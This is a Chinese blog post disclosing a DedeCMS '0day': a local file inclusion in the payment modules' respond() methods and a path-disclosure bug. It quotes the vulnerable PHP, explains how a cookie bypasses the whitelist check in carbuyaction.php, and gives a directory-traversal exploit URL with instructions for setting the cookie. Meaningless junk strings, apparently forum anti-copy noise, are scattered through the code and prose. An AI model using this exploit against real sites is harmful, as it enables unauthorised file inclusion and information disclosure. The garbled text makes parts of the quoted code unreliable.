dedecms本地文件包含及物理路径泄露0day

admin

晚餐吃撑了，瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多，赶紧下了套，用editplus搜索了几个关键字，果然发现些问题。(话说平时写代码也喜欢用editplus，小巧方便多年习惯)

出现漏洞的两个文件为：
7 S/ A+ B1 g* ?2 R! X2 Z9 c9 {Include/payment/alipay.php
* U' W9 \. B5 U1 g5 w# k0 j1 j% cInclude/payment/yeepay.php
* y" {1 `& ~0 w! {' {漏洞均出现在respond方法里，估计这两个文件是临时工写的。
& ?& J/ D) \* u1 x/ c4 D
0 Q4 z$ @2 ]# A) o% N8 z" sInclude/payment/alipay.php

......
   function respond()
    {
        if (!empty($_POST))
1 ~6 w" Z; T$ C! q2 m) F        {
$ x# m% M: d6 \, W" M            foreach($_POST as $key => $data)
            {
                $_GET[$key] = $data;
            }
        }
        /* 引入配置文件 */
        require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';
......

, J. ~, _; l. E5 P
大概在133行左右，$_GET[‘code’]没有经过任何判断和过滤。

* f& i% h* R; r# p) y, ]9 @Include/payment/yeepay.php
: o7 w4 T9 y7 }" k7 j

4 o' I- i  I1 Y. v9 w
+ K& f9 Z  G6 C+ t6 Q: N% p......
5 g8 S/ S& j: |. J1 |    function respond()
- ^% P" o) W( J' |    {
8 z5 g, E5 Q7 v
: c2 r5 N& S" u; S, c' |' H! ~5 x# ]        /* 引入配置文件 */
        require_once DEDEDATA.'/payment/'.$_REQUEST['code'].'.php';
6 ?2 L5 [2 t- v. D- }! G
        $p1_MerId = trim($payment['yp_account']);
/ v; E+ L8 w2 y' h3 [6 T; T/ Q        $merchantKey = trim($payment['yp_key']);
......
) Z# r' J$ E, w/ c
/ ?) S) j) l5 @! s

5 R  W. {/ J# J/ U5 z2 A+ w
大概在145行左右，$_REQUEST['code']没有经过任何判断和过滤。

这两个方法在plus/carbuyaction.php文件调用。

0 c3 M# \6 D) d8 f( Splus/carbuyaction.php

( U! _& z! ^4 ]* M. {8 A......
} else if ($dopost == 'return') {
    $write_list = array('alipay', 'bank', 'cod', 'yeepay');
    if (in_array($code, $write_list))
: T& t$ U0 E* b  x: F4 c" h    {
        require_once DEDEINC.'/payment/'.$code.'.php';
        $pay = new $code;
        $msg=$pay->respond();
        ShowMsg($msg, "javascript:;", 0, 3000);
. t/ }0 _/ L0 `9 d/ G1 X        exit();  
* A  j+ ]4 a- y0 f0 \1 V. Y    } else {
$ O" M, F# G! V1 }- h- @; v        exit('Error:File Type Can\'t Recognized!');
    }
5 ^7 c8 B! h8 j8 l! a  K4 z}
" t( o$ i. T2 P2 Z$ |; |; r1 P7 O......
- P; r! \+ Y2 a2 E+ f* }

$ Y5 ^# Z' I3 X# v5 o# x

# j% y$ q7 Q; j) j; b# p  r3 P
) j7 ?0 h! n) K  _/ o
大概在334行，当$dopost等于return的时候就开始进入过程了。熟悉dedecms朋友都知道在include/common.inc.php使用了一种类似register_globals的机制。
5 a. c) M# @5 b* v+ w  ^- x所以$_GET['code']或$_REQUEST['code']会变成$code，而$code是经过判断的，值必须在$write_list数组以内这样才能继续后面的流程调用respond方法触发漏洞。这样的话貌似就无法控制$_GET['code']为任意值了。

回到include/common.inc.php来看看他的机制。
8 i- |% I# Y. x
0 e! G5 |! L' T  M9 L
" ]- E3 G' u; O; x8 |6 k; g
. K8 G0 ?* d4 J$ S3 B, k......
2 Z3 M; }8 _% Lforeach(Array('_GET','_POST','_COOKIE') as $_request)
{
        foreach($$_request as $_k => $_v)
        {
$ M4 z0 j- {  u+ \/ c                if($_k == 'nvarname') ${$_k} = $_v;
                else ${$_k} = _RunMagicQuotes($_v);
        }
( ^. A2 ]; e6 x6 w  ?3 d/ k}
, J. D5 w8 \4 b1 d5 d- O  r9 e- ^......
大概在79行，可以看到他是从$_GET,$_POST,$_COOKIE这三个全局变量里取值的。嘿嘿，细心点就发现了吧。从他这个优先机制来讲他是先从get再从post再从cookie也就是说最终$code会是以$_COOKIE[‘code’]的值为准，而我们要控制的是$_GET[‘code’]或$_REQUEST['code']只须要$code的值在$write_list数组以内就行了。Exp:http://www.php0day.com/plus/carb ... amp;code=../../tags上面的Exp是包含根目录下的tags.php文件包含其他后缀请自行构造截断，使用exp测试时须要自己添加一个code等于alipay或yeepay的cookie。暴路径:
/ Q+ j9 G; y3 y; N. v由于bank和cod这两个文件并没有respond方法，所以如果code等于bank或者cod时将会暴错泄露路径。注：请勿非法测试，产生后果与本人无关。